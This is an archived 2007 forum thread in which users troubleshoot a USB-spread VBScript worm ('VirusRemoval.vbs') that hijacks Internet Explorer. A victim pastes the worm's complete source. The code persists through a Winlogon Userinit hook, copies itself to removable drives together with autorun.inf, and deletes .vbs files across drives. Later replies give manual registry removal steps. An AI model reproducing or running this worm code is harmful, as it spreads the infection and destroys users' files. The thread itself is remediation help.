View Full Version : wscript.exe is it to blame?
gsoul2soul
19-10-2007, 11:20 PM
This is irritating like hell.... trust me !!!
Well somehow i have contracted this lil "virus, or bug... or some script written by pesty over smart programmer" grrrrr x(
Now thing is when i open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all"
Now i remove the title bar "name" and also change the home page in my IE... and as soon as i restart my browser... Blast !! there you go, it appears again !!!
BUT when i kill the "wscript.exe" from "Windows Task manager" it won't happen... why ? what ? and how to remove this problem !!!
HELP... HELP
Mike here... desperate
QwertyManiac
19-10-2007, 11:33 PM
I think I already helped you with the same problem before or this is a false deja vu am experiencing ...
Anyway, you're infected with the "Hacked by Godzilla" attack.
Solution's here:
http://howto.redcomputer.net/windows/hacked_by_godzilla.php
gsoul2soul
20-10-2007, 12:36 AM
qwerty maniac thanks... but that file is not there, the one i should delete. the "vbs file"
Anyways mine just says in IE title bar "www.sujin.com.np" and tries to re-direct my browser to this site... which is now down :(
help
QwertyManiac
20-10-2007, 01:08 AM
Site's pretty apologetic but I think its nearly the same infection.
From site (Google Cache):
If you were directed here through a virus-like program, then I would like to apologize for the problems you had to face because of me. I didn't mean to harm anyone or anyone's computer through this program. The small little script was developed to prevent your computer from any sorts of virus attacks. The script that I developed, would repair any problems in your computer that other viruses had damaged and also prevent any other viruses to enter into your computer. I am sure your computer was not infected by any viruses as long as my script was running in your computer. If you don't believe me just check the script, which is located at the system32 directory as VirusRemoval.vbs
In order to free your computer from my program, please CLICK HERE to download a program called 'Scanner'.
Run this program to free your computer from my script as well as some of the most common viruses.
Please insert your pen drives in your computer while running the program to remove the script from those drives as well
Are the other files taken care of? Any other VBS files might be deleted as well. Perform the same steps just more flexibly :)
And yes, delete ALL vbs and autorun from all your drives, even your externals, pen drives and phones.
gsoul2soul
20-10-2007, 02:59 PM
I opened one of my Pen drives... and found this "Virusremoval.vbs" and "autorun.inf"
Now i opened the VBS file in Notepad... and here what it says:
Shall i click on it... or is it just a way of infecting more?
'************************************************* *****************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'************************************************* *****************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'************************************************* *****************
'************************************************* *****************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives, InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,fi les,Delete,auto,root
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=ro ot Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
Yavin
28-10-2007, 06:16 PM
First
Open task manager and kill process wscript.exe.
Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.
Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.
Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell which should have value of just explorer.exe.
delete anything after explorer.exe.
Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.
Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np
Under the same key locate Start Page and delete its value i.e. http://sujin.com.np/
I think that's all guys. I'm sure it will help.
Guys u can also disable the use of vbs and js files from the registry. For that
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs or js files it will display the message you can see on your own.
NavinRaj
15-11-2007, 10:06 PM
Yavin's process removes the virus but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and enable the disabled task manager and folder options.
You guys can also try it from:
http://www.kusom.edu.np/new/notices_detail.php?noticeid=13
or
http://www.swiftnepal.net/
First
Open task manager and kill process wscript.exe.
Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.
Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.
Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell which should have value of just explorer.exe.
delete anything after explorer.exe.
Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.
Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np
Under the same key locate Start Page and delete its value i.e. http://sujin.com.np/
I think that's all guys. I'm sure it will help.
Guys u can also disable the use of vbs and js files from the registry. For that
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs or js files it will display the message you can see on your own.
bhutanesedude
24-11-2007, 04:14 PM
Does any one have a software of Antivirus which can remove this sujin.com.np? I think I have to inform the case to Cyber Crime Investigation so that who ever is this Sujin is wrecked for the whole life to avoid in making such kind of tools. this hell **** is making my system slow and even I cannot do my work efficiently.
saubrl
26-11-2007, 09:04 PM
Dont u use any antivirus?
I use NOD32 with update 3 month old but even it is able to detect wscript.exe.
bhutanesedude
26-11-2007, 11:11 PM
NOD32? Does this functions good enough to clear this virus from every corner o our system? or it just takes out the title and web address from our IE.....I think http://www.swiftnepal.net/ has a anti virus for this problem which functions well...what u think my fellow users?
apslogin@gmail.com
07-12-2007, 12:23 PM
How can remove Virusremoval.vbs
Setp1:open My computer
Setp 2: go to toos Menu>folder Options>view (TAb)> Uncheck Hide extentions for known file types & check Show hiden file and folder & unchek Hide protected operating system files.
Step3: go run> c:\windows\system32\
Step4: Search "Virsuremoval.vbs"
Step5:rename file "Virsuremoval.vbs" to "virusremoval"
and
Enjoy!
prakash2119
19-01-2008, 11:33 AM
@Yavin thanks a lot bhai.Iam in loss of words to thank you.This really worked...
figjam00
28-03-2008, 01:58 PM
I solved this wscript.exe but windows script host settings always run at startup ?????? plz reply!!!!!!!!
vBulletin® v3.7.0, Copyright ©2000-2008, Jelsoft Enterprises Ltd.